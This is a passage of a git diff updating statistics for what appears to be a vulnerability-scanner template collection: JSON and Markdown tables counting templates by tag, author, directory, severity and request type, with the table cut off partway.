gajbhiye","count":1},{"name":"akash.c","count":1}],"directory":[{"name":"Users","count":1693}],"severity":[{"name":"info","count":535},{"name":"high","count":426},{"name":"medium","count":349},{"name":"critical","count":201},{"name":"low","count":147}],"types":[{"name":"http","count":1566},{"name":"file","count":42},{"name":"network","count":35},{"name":"dns","count":10}]} \ No newline at end of file +{"tags":[{"name":"cve","count":511},{"name":"panel","count":202},{"name":"xss","count":182},{"name":"wordpress","count":180},{"name":"exposure","count":176},{"name":"rce","count":173},{"name":"cve2020","count":145},{"name":"lfi","count":143},{"name":"wp-plugin","count":120},{"name":"config","count":90},{"name":"cve2021","count":83},{"name":"cve2019","count":82},{"name":"tech","count":78},{"name":"takeover","count":72},{"name":"cve2018","count":66},{"name":"","count":66},{"name":"token","count":63},{"name":"apache","count":61},{"name":"default-login","count":50},{"name":"iot","count":43},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":40},{"name":"network","count":35},{"name":"sqli","count":34},{"name":"oob","count":32},{"name":"logs","count":29},{"name":"workflow","count":29},{"name":"oracle","count":29},{"name":"ssrf","count":27},{"name":"misc","count":27},{"name":"jira","count":26},{"name":"atlassian","count":26},{"name":"disclosure","count":25},{"name":"cve2016","count":23},{"name":"listing","count":22},{"name":"redirect","count":20},{"name":"aem","count":19},{"name":"cisco","count":17},{"name":"sap","count":16},{"name":"debug","count":14},{"name":"fuzz","count":13},{"name":"misconfig","count":13},{"name":"struts","count":13},{"name":"cve2015","count":13},{"name":"adobe","count":12},{"name":"weblogic","count":12},{"name":"android","count":12},{"name":"auth-bypass","count":12},{"name":"zoho","count":11},{"name":"springboot","count":11},{"name":"cve2011","count":11},{"name":"dns","count":11},{"name":"cve2012","count":11},{"name":"dlink","count":10},{"name":"jenkins","count":10},{"name":"cve2014","count":10},{"name":"php","count":10},{"name":"cve2013","count":10},{"name":"devops","count":10},{"name":"magento","count":9},{"name":"gitlab","count":8},{"name":"router","count":8},{"name":"ftp","count":8},{"name":"airflow","count":8},{"name":"aws","count":8},{"name":"rails","count":8},{"name":"cnvd","count":8},{"name":"vmware","count":7},{"name":"xxe","count":7},{"name":"joomla","count":7},{"name":"nginx","count":7},{"name":"scada","count":7},{"name":"citrix","count":6},{"name":"api","count":6},{"name":"cms","count":6},{"name":"rconfig","count":6},{"name":"backup","count":6},{"name":"coldfusion","count":6},{"name":"jetty","count":6},{"name":"google","count":6},{"name":"java","count":5},{"name":"headless","count":5},{"name":"netgear","count":5},{"name":"confluence","count":5},{"name":"circarlife","count":5},{"name":"drupal","count":5},{"name":"cve2009","count":5},{"name":"phpmyadmin","count":5},{"name":"ruijie","count":5},{"name":"dedecms","count":5},{"name":"iis","count":5},{"name":"dell","count":5},{"name":"laravel","count":5},{"name":"files","count":5},{"name":"login","count":5},{"name":"lucee","count":5},{"name":"solr","count":5},{"name":"ssti","count":5},{"name":"django","count":5},{"name":"ibm","count":5},{"name":"fileupload","count":4},{"name":"solarwinds","count":4},{"name":"webserver","count":4},{"name":"tomcat","count":4},{"name":"elastic","count":4},{"name":"moodle","count":4},{"name":"jolokia","count":4},{"name":"docker","count":4},{"name":"crlf","count":4},{"name":"hongdian","count":4},{"name":"nodejs","count":4},{"name":"traversal","count":4},{"name":"vpn","count":4},{"name":"magmi","count":4},{"name":"samsung","count":4},{"name":"thinkphp","count":4},{"name":"asp","count":4},{"name":"thinkcmf","count":4},{"name":"artifactory","count":4},{"name":"openssh","count":3},{"name":"vbulletin","count":3},{"name":"deserialization","count":3},{"name":"log","count":3},{"name":"fpd","count":3},{"name":"bypass","count":3},{"name":"fanruan","count":3},{"name":"nacos","count":3},{"name":"windows","count":3},{"name":"git","count":3},{"name":"resin","count":3},{"name":"cve2010","count":3},{"name":"targa","count":3},{"name":"springcloud","count":3},{"name":"hp","count":3},{"name":"oa","count":3},{"name":"kubernetes","count":3},{"name":"grafana","count":3},{"name":"r-seenet","count":3},{"name":"ssh","count":3},{"name":"slack","count":3},{"name":"backups","count":3},{"name":"mongodb","count":3},{"name":"terramaster","count":3},{"name":"nosqli","count":3},{"name":"printer","count":3},{"name":"ebs","count":3},{"name":"amazon","count":3},{"name":"ofbiz","count":3},{"name":"kafka","count":3},{"name":"microstrategy","count":3},{"name":"caucho","count":3},{"name":"lfr","count":3},{"name":"sonarqube","count":2},{"name":"shellshock","count":2},{"name":"fortios","count":2},{"name":"strapi","count":2},{"name":"dos","count":2},{"name":"saltstack","count":2},{"name":"showdoc","count":2},{"name":"openam","count":2},{"name":"cve2007","count":2},{"name":"frp","count":2},{"name":"nagios","count":2},{"name":"proxy","count":2},{"name":"seeyon","count":2},{"name":"keycloak","count":2},{"name":"cve2008","count":2},{"name":"bitrix","count":2},{"name":"smb","count":2},{"name":"plesk","count":2},{"name":"injection","count":2},{"name":"spark","count":2},{"name":"nexus","count":2},{"name":"openfire","count":2},{"name":"rockethchat","count":2},{"name":"jboss","count":2},{"name":"sharepoint","count":2},{"name":"kibana","count":2},{"name":"nextjs","count":2},{"name":"vrealize","count":2},{"name":"emerge","count":2},{"name":"leak","count":2},{"name":"cache","count":2},{"name":"yapi","count":2},{"name":"sonicwall","count":2},{"name":"prometheus","count":2},{"name":"paloalto","count":2},{"name":"microsoft","count":2},{"name":"trixbox","count":2},{"name":"kevinlab","count":2},{"name":"xxljob","count":2},{"name":"intrusive","count":2},{"name":"voipmonitor","count":2},{"name":"huawei","count":2},{"name":"hjtcloud","count":2},{"name":"mail","count":2},{"name":"rstudio","count":2},{"name":"igs","count":2},{"name":"odoo","count":2},{"name":"chiyu","count":2},{"name":"webcam","count":2},{"name":"ucmdb","count":2},{"name":"glassfish","count":2},{"name":"telerik","count":2},{"name":"zhiyuan","count":2},{"name":"zabbix","count":2},{"name":"flir","count":2},{"name":"service","count":2},{"name":"kentico","count":2},{"name":"splunk","count":2},{"name":"icewarp","count":2},{"name":"bigip","count":2},{"name":"pega","count":2},{"name":"wordfence","count":2},{"name":"linkerd","count":2},{"name":"ecology","count":2},{"name":"chamilo","count":2},{"name":"idrac","count":2},{"name":"smtp","count":2},{"name":"natshell","count":2},{"name":"hpe","count":2},{"name":"globalprotect","count":2},{"name":"oauth","count":2},{"name":"waf","count":2},{"name":"maian","count":2},{"name":"mida","count":2},{"name":"httpd","count":2},{"name":"jellyfin","count":2},{"name":"rockmongo","count":2},{"name":"activemq","count":2},{"name":"couchdb","count":2},{"name":"hashicorp","count":2},{"name":"gitlist","count":1},{"name":"jquery","count":1},{"name":"razor","count":1},{"name":"checkpoint","count":1},{"name":"erp-nc","count":1},{"name":"mongo","count":1},{"name":"idemia","count":1},{"name":"shopware","count":1},{"name":"sangfor","count":1},{"name":"pagespeed","count":1},{"name":"bookstack","count":1},{"name":"spidercontrol","count":1},{"name":"timeclock","count":1},{"name":"zend","count":1},{"name":"tensorboard","count":1},{"name":"blind","count":1},{"name":"klog","count":1},{"name":"varnish","count":1},{"name":"javamelody","count":1},{"name":"2014","count":1},{"name":"oscommerce","count":1},{"name":"discourse","count":1},{"name":"bolt","count":1},{"name":"payara","count":1},{"name":"avalanche","count":1},{"name":"eprints","count":1},{"name":"acexy","count":1},{"name":"mongoshake","count":1},{"name":"wildfly","count":1},{"name":"lancom","count":1},{"name":"magicflow","count":1},{"name":"cloudflare","count":1},{"name":"wazuh","count":1},{"name":"selea","count":1},{"name":"pippoint","count":1},{"name":"bruteforce","count":1},{"name":"tenda","count":1},{"name":"backdoor","count":1},{"name":"swagger","count":1},{"name":"wifisky","count":1},{"name":"socomec","count":1},{"name":"csod","count":1},{"name":"octoprint","count":1},{"name":"etouch","count":1},{"name":"proftpd","count":1},{"name":"wavemaker","count":1},{"name":"clave","count":1},{"name":"plugin","count":1},{"name":"fortigates","count":1},{"name":"fortinet","count":1},{"name":"tensorflow","count":1},{"name":"szhe","count":1},{"name":"phpunit","count":1},{"name":"acme","count":1},{"name":"phalcon","count":1},{"name":"dvwa","count":1},{"name":"ganglia","count":1},{"name":"extractor","count":1},{"name":"fortiweb","count":1},{"name":"panabit","count":1},{"name":"moin","count":1},{"name":"grav","count":1},{"name":"bitly","count":1},{"name":"manageengine","count":1},{"name":"phpfusion","count":1},{"name":"hiboss","count":1},{"name":"mdb","count":1},{"name":"mirai","count":1},{"name":"netdata","count":1},{"name":"liferay","count":1},{"name":"rfi","count":1},{"name":"monitorix","count":1},{"name":"tongda","count":1},{"name":"gloo","count":1},{"name":"expose","count":1},{"name":"trilithic","count":1},{"name":"scimono","count":1},{"name":"visualtools","count":1},{"name":"drone","count":1},{"name":"vsftpd","count":1},{"name":"expn","count":1},{"name":"skywalking","count":1},{"name":"lanproxy","count":1},{"name":"huijietong","count":1},{"name":"jeewms","count":1},{"name":"rhymix","count":1},{"name":"dotnet","count":1},{"name":"soar","count":1},{"name":"k8","count":1},{"name":"jenkin","count":1},{"name":"opensns","count":1},{"name":"nuxeo","count":1},{"name":"nette","count":1},{"name":"nc2","count":1},{"name":"plc","count":1},{"name":"crm","count":1},{"name":"ssltls","count":1},{"name":"redwood","count":1},{"name":"nordex","count":1},{"name":"wso2","count":1},{"name":"goahead","count":1},{"name":"doh","count":1},{"name":"lansweeper","count":1},{"name":"harbor","count":1},{"name":"firebase","count":1},{"name":"redhat","count":1},{"name":"wiki","count":1},{"name":"sceditor","count":1},{"name":"sitecore","count":1},{"name":"vsphere","count":1},{"name":"ec2","count":1},{"name":"plone","count":1},{"name":"primetek","count":1},{"name":"wuzhicms","count":1},{"name":"lotuscms","count":1},{"name":"fedora","count":1},{"name":"itop","count":1},{"name":"monitorr","count":1},{"name":"dotclear","count":1},{"name":"triconsole","count":1},{"name":"circontrol","count":1},{"name":"lutron","count":1},{"name":"bash","count":1},{"name":"st","count":1},{"name":"alibaba","count":1},{"name":"parentlink","count":1},{"name":"diris","count":1},{"name":"totaljs","count":1},{"name":"comodo","count":1},{"name":"nexusdb","count":1},{"name":"circontrorl","count":1},{"name":"zte","count":1},{"name":"nuuo","count":1},{"name":"postmessage","count":1},{"name":"setup","count":1},{"name":"mautic","count":1},{"name":"zarafa","count":1},{"name":"zmanda","count":1},{"name":"dotnetnuke","count":1},{"name":"beanshell","count":1},{"name":"upload","count":1},{"name":"blue-ocean","count":1},{"name":"plastic","count":1},{"name":"vscode","count":1},{"name":"ruby","count":1},{"name":"fastapi","count":1},{"name":"ulterius","count":1},{"name":"xunchi","count":1},{"name":"sentry","count":1},{"name":"ruckus","count":1},{"name":"nsasg","count":1},{"name":"jmx","count":1},{"name":"chinaunicom","count":1},{"name":"darkstat","count":1},{"name":"memcached","count":1},{"name":"stem","count":1},{"name":"grails","count":1},{"name":"kafdrop","count":1},{"name":"enum","count":1},{"name":"zimbra","count":1},{"name":"ilo4","count":1},{"name":"rdp","count":1},{"name":"anchorcms","count":1},{"name":"nedi","count":1},{"name":"mara","count":1},{"name":"mantis","count":1},{"name":"sco","count":1},{"name":"faraday","count":1},{"name":"hasura","count":1},{"name":"kerbynet","count":1},{"name":"servicedesk","count":1},{"name":"opentsdb","count":1},{"name":"salesforce","count":1},{"name":"fastcgi","count":1},{"name":"appweb","count":1},{"name":"openerp","count":1},{"name":"woocomernce","count":1},{"name":"octobercms","count":1},{"name":"linkedin","count":1},{"name":"yachtcontrol","count":1},{"name":"zm","count":1},{"name":"tapestry","count":1},{"name":"vnc","count":1},{"name":"node-red-dashboard","count":1},{"name":"mobileiron","count":1},{"name":"ssl","count":1},{"name":"ecom","count":1},{"name":"empirecms","count":1},{"name":"postgres","count":1},{"name":"svnserve","count":1},{"name":"heroku","count":1},{"name":"moinmoin","count":1},{"name":"centos","count":1},{"name":"jitsi","count":1},{"name":"cacti","count":1},{"name":"cse","count":1},{"name":"cocoon","count":1},{"name":"csrf","count":1},{"name":"timesheet","count":1},{"name":"keenetic","count":1},{"name":"xff","count":1},{"name":"flash","count":1},{"name":"gogs","count":1},{"name":"majordomo2","count":1},{"name":"opensmtpd","count":1},{"name":"exchange","count":1},{"name":"opm","count":1},{"name":"fuelcms","count":1},{"name":"pulsesecure","count":1},{"name":"pgadmin","count":1},{"name":"webui","count":1},{"name":"tpshop","count":1},{"name":"interlib","count":1},{"name":"mpsec","count":1},{"name":"exacqvision","count":1},{"name":"sprintful","count":1},{"name":"bullwark","count":1},{"name":"netrc","count":1},{"name":"openrestry","count":1},{"name":"smartsense","count":1},{"name":"flink","count":1},{"name":"metinfo","count":1},{"name":"robomongo","count":1},{"name":"emc","count":1},{"name":"fortigate","count":1},{"name":"cve2005","count":1},{"name":"gridx","count":1},{"name":"synnefo","count":1},{"name":"calendarix","count":1},{"name":"eyou","count":1},{"name":"xdcms","count":1},{"name":"subrion","count":1},{"name":"servicenow","count":1},{"name":"rmi","count":1},{"name":"db","count":1},{"name":"enumeration","count":1},{"name":"powercreator","count":1},{"name":"jenzabar","count":1},{"name":"zzzcms","count":1},{"name":"openstack","count":1},{"name":"ems","count":1},{"name":"wmt","count":1},{"name":"chevereto","count":1},{"name":"74cms","count":1},{"name":"mailchimp","count":1},{"name":"webadmin","count":1},{"name":"glances","count":1},{"name":"cgi","count":1},{"name":"episerver","count":1},{"name":"dompdf","count":1},{"name":"rsyncd","count":1},{"name":"shopxo","count":1},{"name":"aspnuke","count":1},{"name":"viewpoint","count":1},{"name":"mariadb","count":1},{"name":"wavlink","count":1},{"name":"javafaces","count":1},{"name":"webmodule-ee","count":1},{"name":"hortonworks","count":1},{"name":"kubeflow","count":1},{"name":"sqlite","count":1},{"name":"cors","count":1},{"name":"geutebruck","count":1},{"name":"labtech","count":1},{"name":"apiman","count":1},{"name":"nps","count":1},{"name":"jnoj","count":1},{"name":"azure","count":1},{"name":"fortilogger","count":1},{"name":"zenario","count":1},{"name":"duomicms","count":1},{"name":"seacms","count":1},{"name":"linksys","count":1},{"name":"thinkadmin","count":1},{"name":"finereport","count":1},{"name":"viewlinc","count":1},{"name":"haproxy","count":1},{"name":"spring","count":1},{"name":"npm","count":1},{"name":"xml","count":1},{"name":"wamp","count":1},{"name":"spectracom","count":1},{"name":"ricoh","count":1},{"name":"pacsone","count":1},{"name":"rubedo","count":1},{"name":"xmlchart","count":1},{"name":"concrete","count":1},{"name":"landray","count":1},{"name":"accela","count":1},{"name":"mediumish","count":1},{"name":"alerta","count":1},{"name":"k8s","count":1},{"name":"avtech","count":1},{"name":"akamai","count":1},{"name":"weiphp","count":1},{"name":"ntopng","count":1},{"name":"wp-theme","count":1},{"name":"turbocrm","count":1},{"name":"netis","count":1},{"name":"expressjs","count":1},{"name":"kyan","count":1},{"name":" default-login","count":1},{"name":"redis","count":1},{"name":"starttls","count":1},{"name":"livezilla","count":1},{"name":"dlogin","count":1},{"name":"ns","count":1},{"name":"esmtp","count":1},{"name":"tika","count":1},{"name":"uwsgi","count":1},{"name":"sarg","count":1},{"name":"glpi","count":1},{"name":"rmc","count":1},{"name":"kong","count":1},{"name":"favicon","count":1},{"name":"fiori","count":1},{"name":"cloudinary","count":1},{"name":"blackboard","count":1},{"name":"symfony","count":1},{"name":"panos","count":1},{"name":"landrayoa","count":1},{"name":"druid","count":1},{"name":"gateone","count":1},{"name":"redcap","count":1},{"name":"svn","count":1},{"name":"aura","count":1},{"name":"floc","count":1},{"name":"feifeicms","count":1},{"name":"arl","count":1},{"name":"lighttpd","count":1},{"name":"portainer","count":1},{"name":"hadoop","count":1},{"name":"maccmsv10","count":1},{"name":"wooyun","count":1},{"name":"solman","count":1},{"name":"horde","count":1},{"name":"sidekiq","count":1},{"name":"krweb","count":1},{"name":"htmli","count":1},{"name":"myucms","count":1},{"name":"h3c-imc","count":1},{"name":"tileserver","count":1},{"name":"email","count":1},{"name":"iptime","count":1},{"name":"domxss","count":1},{"name":"ueditor","count":1},{"name":"bedita","count":1},{"name":"traefik","count":1},{"name":"mcafee","count":1},{"name":"commscope","count":1},{"name":"geddy","count":1},{"name":"realteo","count":1},{"name":"addpac","count":1},{"name":"jfrog","count":1},{"name":"node","count":1},{"name":"biometrics","count":1},{"name":"optiLink","count":1},{"name":"webftp","count":1},{"name":"emby","count":1},{"name":"ioncube","count":1},{"name":"axis","count":1},{"name":"visionhub","count":1},{"name":"saltapi","count":1},{"name":"rabbitmq","count":1},{"name":"alertmanager","count":1},{"name":"codeigniter","count":1},{"name":"yii","count":1},{"name":"clusterengine","count":1},{"name":"status","count":1},{"name":"spf","count":1},{"name":"zcms","count":1},{"name":"jsf","count":1},{"name":"opencast","count":1},{"name":"zookeeper","count":1},{"name":"dom","count":1},{"name":"discord","count":1},{"name":"codemeter","count":1},{"name":"embedthis","count":1},{"name":"akkadian","count":1},{"name":"mysql","count":1},{"name":"phpinfo","count":1},{"name":"rujjie","count":1},{"name":"apos","count":1},{"name":"dvr","count":1},{"name":"xiuno","count":1},{"name":"nomad","count":1},{"name":"springframework","count":1},{"name":"ambari","count":1},{"name":"pyramid","count":1},{"name":"zeroshell","count":1},{"name":"clockwatch","count":1},{"name":"scs","count":1},{"name":"b2evolution","count":1},{"name":"netsweeper","count":1},{"name":"webmin","count":1},{"name":"cobub","count":1},{"name":"adminer","count":1},{"name":"jsp","count":1},{"name":"upnp","count":1},{"name":"tamronos","count":1},{"name":"javascript","count":1},{"name":"mantisbt","count":1}],"authors":[{"name":"dhiyaneshdk","count":220},{"name":"pikpikcu","count":195},{"name":"pdteam","count":187},{"name":"dwisiswant0","count":126},{"name":"geeknik","count":119},{"name":"daffainfo","count":99},{"name":"madrobot","count":60},{"name":"princechaddha","count":52},{"name":"gy741","count":48},{"name":"gaurang","count":42},{"name":"pussycat0x","count":34},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":20},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"philippedelteil","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":9},{"name":"righettod","count":9},{"name":"iamthefrogy","count":8},{"name":"melbadry9","count":8},{"name":"hackergautam","count":8},{"name":"nadino","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"0x240x23elu","count":7},{"name":"randomstr1ng","count":7},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"dr_set","count":7},{"name":"r3dg33k","count":7},{"name":"kophjager007","count":7},{"name":"emadshanab","count":7},{"name":"harshbothra_","count":7},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"joanbono","count":5},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"elsfa7110","count":4},{"name":"iamnoooob","count":4},{"name":"xelkomy","count":4},{"name":"rootxharsh","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"meme-lord","count":4},{"name":"github.com/its0x08","count":4},{"name":"yash anand @yashanand155","count":3},{"name":"mavericknerd","count":3},{"name":"fyoorer","count":3},{"name":"binaryfigments","count":3},{"name":"_generic_human_","count":3},{"name":"tess","count":3},{"name":"impramodsargar","count":3},{"name":"0w4ys","count":3},{"name":"jarijaas","count":3},{"name":"f1tz","count":3},{"name":"shine","count":3},{"name":"thomas_from_offensity","count":3},{"name":"z3bd","count":3},{"name":"dudez","count":3},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"bp0lr","count":2},{"name":"x1m_martijn","count":2},{"name":"0xrudra","count":2},{"name":"w4cky_","count":2},{"name":"0xsapra","count":2},{"name":"bsysop","count":2},{"name":"random-robbie","count":2},{"name":"manas_harsh","count":2},{"name":"shifacyclewala","count":2},{"name":"koti2","count":2},{"name":"lotusdll","count":2},{"name":"unstabl3","count":2},{"name":"udit_thakkur","count":2},{"name":"nkxxkn","count":2},{"name":"swissky","count":2},{"name":"afaq","count":2},{"name":"ree4pwn","count":2},{"name":"dheerajmadhukar","count":2},{"name":"randomrobbie","count":2},{"name":"0xelkomy","count":2},{"name":"pxmme1337","count":2},{"name":"vavkamil","count":2},{"name":"emenalf","count":2},{"name":"incogbyte","count":2},{"name":"gevakun","count":2},{"name":"moritz nentwig","count":2},{"name":"0xprial","count":2},{"name":"davidmckennirey","count":2},{"name":"zomsop82","count":2},{"name":"0xcrypto","count":2},{"name":"fabaff","count":2},{"name":"joeldeleep","count":2},{"name":"ehsahil","count":2},{"name":"lu4nx","count":2},{"name":"amsda","count":2},{"name":"kiblyn11","count":2},{"name":"bing0o","count":2},{"name":"foulenzer","count":2},{"name":"hetroublemakr","count":2},{"name":"alph4byt3","count":1},{"name":"fmunozs","count":1},{"name":"becivells","count":1},{"name":"luci","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"mah3sec_","count":1},{"name":"thezakman","count":1},{"name":"b0yd","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"smaranchand","count":1},{"name":"juicypotato1","count":1},{"name":"willd96","count":1},{"name":"alifathi-h1","count":1},{"name":"omarkurt","count":1},{"name":"j33n1k4","count":1},{"name":"bolli95","count":1},{"name":"dogasantos","count":1},{"name":"remonsec","count":1},{"name":"alperenkesk","count":1},{"name":"andysvints","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"_c0wb0y_","count":1},{"name":"sicksec","count":1},{"name":"petruknisme","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"@dwisiswant0","count":1},{"name":"naglinagli","count":1},{"name":"s1r1u5_","count":1},{"name":"elmahdi","count":1},{"name":"deena","count":1},{"name":"_harleo","count":1},{"name":"gboddin","count":1},{"name":"nytr0gen","count":1},{"name":"luskabol","count":1},{"name":"divya_mudgal","count":1},{"name":"undefl0w","count":1},{"name":"d0rkerdevil","count":1},{"name":"tim_koopmans","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"0xtavian","count":1},{"name":"0ut0fb4nd","count":1},{"name":"regala_","count":1},{"name":"hanlaomo","count":1},{"name":"0xrod","count":1},{"name":"rodnt","count":1},{"name":"co0nan","count":1},{"name":"sy3omda","count":1},{"name":"revblock","count":1},{"name":"ilovebinbash","count":1},{"name":"jteles","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"tirtha_mandal","count":1},{"name":"abison_binoy","count":1},{"name":"0xteles","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"ahmed sherif","count":1},{"name":"streetofhackerr007","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"un-fmunozs","count":1},{"name":"shelld3v","count":1},{"name":"_darrenmartyn","count":1},{"name":"pdp","count":1},{"name":"whynotke","count":1},{"name":"0h1in9e","count":1},{"name":"mohammedsaneem","count":1},{"name":"flag007","count":1},{"name":"r3naissance","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"raesene","count":1},{"name":"mhdsamx","count":1},{"name":"jeya seelan","count":1},{"name":"yashgoti","count":1},{"name":"gal nagli","count":1},{"name":"kabirsuda","count":1},{"name":"vzamanillo","count":1},{"name":"makyotox","count":1},{"name":"andirrahmani1","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"pudsec","count":1},{"name":"patralos","count":1},{"name":"qlkwej","count":1},{"name":"zandros0","count":1},{"name":"aresx","count":1},{"name":"vsh00t","count":1},{"name":"blckraven","count":1},{"name":"arcc","count":1},{"name":"rojanrijal","count":1},{"name":"taielab","count":1},{"name":"shifacyclewla","count":1},{"name":"affix","count":1},{"name":"kurohost","count":1},{"name":"furkansenan","count":1},{"name":"fopina","count":1},{"name":"ooooooo_q","count":1},{"name":"ipanda","count":1},{"name":"52971","count":1},{"name":"sickwell","count":1},{"name":"manuelbua","count":1},{"name":"dawid czarnecki","count":1},{"name":"noamrathaus","count":1},{"name":"notsoevilweasel","count":1},{"name":"schniggie","count":1},{"name":"johnjhacking","count":1},{"name":"berkdusunur","count":1},{"name":"daviey","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"akash.c","count":1},{"name":"akshansh","count":1},{"name":"zhenwarx","count":1},{"name":"chron0x","count":1},{"name":"yashanand155","count":1},{"name":"geraldino2","count":1},{"name":"cookiehanhoan","count":1},{"name":"johnk3r","count":1},{"name":"ringo","count":1},{"name":"kareemse1im","count":1},{"name":"ohlinge","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"iampritam","count":1},{"name":"toufik airane","count":1},{"name":"thevillagehacker","count":1},{"name":"idealphase","count":1},{"name":"defr0ggy","count":1},{"name":"ajaysenr","count":1},{"name":"alex","count":1},{"name":"soyelmago","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"yavolo","count":1},{"name":"rtcms","count":1},{"name":"micha3lb3n","count":1},{"name":"mubassirpatel","count":1},{"name":"its0x08","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"retr0","count":1},{"name":"exploitation","count":1},{"name":"bjhulst","count":1},{"name":"th3.d1p4k","count":1},{"name":"b4uh0lz","count":1},{"name":"sullo","count":1},{"name":"bernardofsr","count":1},{"name":"shreyapohekar","count":1},{"name":"apt-mirror","count":1},{"name":"ldionmarcil","count":1},{"name":"hakluke","count":1},{"name":"knassar702","count":1},{"name":"bad5ect0r","count":1},{"name":"wabafet","count":1},{"name":"absshax","count":1},{"name":"c3l3si4n","count":1},{"name":"sshell","count":1}],"directory":[{"name":"cves","count":518},{"name":"vulnerabilities","count":246},{"name":"exposed-panels","count":204},{"name":"exposures","count":168},{"name":"technologies","count":136},{"name":"misconfiguration","count":115},{"name":"takeovers","count":70},{"name":"default-logins","count":49},{"name":"file","count":42},{"name":"workflows","count":34},{"name":"network","count":27},{"name":"miscellaneous","count":27},{"name":"iot","count":22},{"name":"fuzzing","count":10},{"name":"dns","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":535},{"name":"high","count":426},{"name":"medium","count":349},{"name":"critical","count":201},{"name":"low","count":147}],"types":[{"name":"http","count":1566},{"name":"file","count":42},{"name":"network","count":35},{"name":"dns","count":10}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 95b97005c8..f99c983619 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,644 +1,643 @@ -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|--------------------|-------|--------------------------------------------|-------|-----------|-------|----------|-------|---------|-------| -| cve | 511 | dhiyaneshdk | 220 | Users | 1693 | info | 535 | http | 1566 | -| panel | 202 | pikpikcu | 195 | | | high | 426 | file | 42 | -| xss | 182 | pdteam | 187 | | | medium | 349 | network | 35 | -| wordpress | 180 | dwisiswant0 | 126 | | | critical | 201 | dns | 10 | -| exposure | 176 | geeknik | 119 | | | low | 147 | | | -| rce | 173 | daffainfo | 99 | | | | | | | -| cve2020 | 145 | madrobot | 60 | | | | | | | -| lfi | 143 | princechaddha | 52 | | | | | | | -| wp-plugin | 120 | gy741 | 48 | | | | | | | -| config | 90 | gaurang | 42 | | | | | | | -| cve2021 | 83 | pussycat0x | 34 | | | | | | | -| cve2019 | 82 | ice3man | 26 | | | | | | | -| tech | 78 | organiccrap | 24 | | | | | | | -| takeover | 72 | 0x_akoko | 20 | | | | | | | -| | 66 | sheikhrishad | 15 | | | | | | | -| cve2018 | 66 | milo2012 | 14 | | | | | | | -| token | 63 | philippedelteil | 14 | | | | | | | -| apache | 61 | pr3r00t | 13 | | | | | | | -| default-login | 50 | techbrunchfr | 13 | | | | | | | -| iot | 43 | suman_kar | 12 | | | | | | | -| cve2017 | 43 | cyllective | 11 | | | | | | | -| file | 42 | random_robbie | 10 | | | | | | | -| unauth | 40 | wdahlenb | 9 | | | | | | | -| network | 35 | righettod | 9 | | | | | | | -| sqli | 34 | iamthefrogy | 8 | | | | | | | -| oob | 32 | nadino | 8 | | | | | | | -| workflow | 29 | aashiq | 8 | | | | | | | -| logs | 29 | that_juan_ | 8 | | | | | | | -| oracle | 29 | melbadry9 | 8 | | | | | | | -| misc | 27 | hackergautam | 8 | | | | | | | -| ssrf | 27 | 0x240x23elu | 7 | | | | | | | -| atlassian | 26 | dr_set | 7 | | | | | | | -| jira | 26 | r3dg33k | 7 | | | | | | | -| disclosure | 25 | techryptic (@tech) | 7 | | | | | | | -| cve2016 | 23 | kophjager007 | 7 | | | | | | | -| listing | 22 | harshbothra_ | 7 | | | | | | | -| redirect | 20 | randomstr1ng | 7 | | | | | | | -| aem | 19 | emadshanab | 7 | | | | | | | -| cisco | 17 | oppsec | 7 | | | | | | | -| sap | 16 | __fazal | 6 | | | | | | | -| debug | 14 | caspergn | 6 | | | | | | | -| fuzz | 13 | puzzlepeaches | 6 | | | | | | | -| misconfig | 13 | yanyun | 5 | | | | | | | -| cve2015 | 13 | ganofins | 5 | | | | | | | -| struts | 13 | pentest_swissky | 5 | | | | | | | -| adobe | 12 | panch0r3d | 5 | | | | | | | -| auth-bypass | 12 | joanbono | 5 | | | | | | | -| weblogic | 12 | nodauf | 4 | | | | | | | -| android | 12 | iamnoooob | 4 | | | | | | | -| cve2011 | 11 | elsfa7110 | 4 | | | | | | | -| dns | 11 | github.com/its0x08 | 4 | | | | | | | -| cve2012 | 11 | e_schultze_ | 4 | | | | | | | -| zoho | 11 | xelkomy | 4 | | | | | | | -| springboot | 11 | meme-lord | 4 | | | | | | | -| dlink | 10 | rootxharsh | 4 | | | | | | | -| php | 10 | tess | 3 | | | | | | | -| devops | 10 | shine | 3 | | | | | | | -| jenkins | 10 | f1tz | 3 | | | | | | | -| cve2013 | 10 | _generic_human_ | 3 | | | | | | | -| cve2014 | 10 | dudez | 3 | | | | | | | -| magento | 9 | 0w4ys | 3 | | | | | 